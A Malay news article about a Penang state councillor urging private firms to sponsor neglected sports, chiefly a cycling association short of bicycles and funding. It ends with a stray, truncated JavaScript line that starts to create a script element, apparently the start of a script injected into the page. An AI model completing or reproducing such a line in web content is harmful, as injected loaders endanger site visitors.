Bersama majukan sukan kurang popular – Exco

Admin

Oleh: WATAWA NATAF ZULKIFLI
Gambar : MARK JAMES

GEORGE TOWN– Exco Belia & Sukan, Pembangunan Wanita, Keluarga dan Komuniti, Chong Eng menyeru syarikat-syarikat swasta supaya bersama membantu memajukan persatuan-persatuan sukan yang kurang diberi perhatian.

Katanya dengan mengambil contoh sukan skuasy, banyak syarikat-syarikat swasta ‘melabur ’ untuk sukan berkenaan dan hasilnya ia kini dipandang tinggi serta mudah untuk mendapat penajaan bagi sesebuah kejohanan.

“Oleh itu, kita mahu perkara yang sama untuk Persatuan Berbasikal Pulau Pinang (PCA) yang mana bukan hanya menghadapi masalah kekurangan basikal, malah juga dana,’’ katanya pada sidang media di sini baru-baru ini.

Turut hadir, Penasihat Pengerusi PCA, Syed Ibrahim Syed Abu Tahir Setiausaha PCA, Munir Mohd. Ismail dan Pegawai Tadbir Majlis Sukan Negeri Pulau Pinang (MSNPP), Harry Chai Heng Hua.

Pada majlis tersebut, MSNPP bagi pihak Kerajaan Negeri turut menyampaikan sebuah basikal kepada PCA.

Dalam pada itu, Munir memberitahu, kini seramai 40 bakat muda berusia 21 tahun ke bawah berada di bawah naungan PCA.

“Justeru, kami (PCA) amat memerlukan jumlah basikal yang mencukupi bagi membolehkan anak-anak muda ini berlatih.

“Setiap basikal latihan dianggarkan bernilai RM2,500,” jelasnya yang turut menyerahkan proposal permohonan bantuan kepada Chong Eng untuk pertimbangan pihak Kerajaan Negeri.

var d=document;var s=d.createElement(‘script’);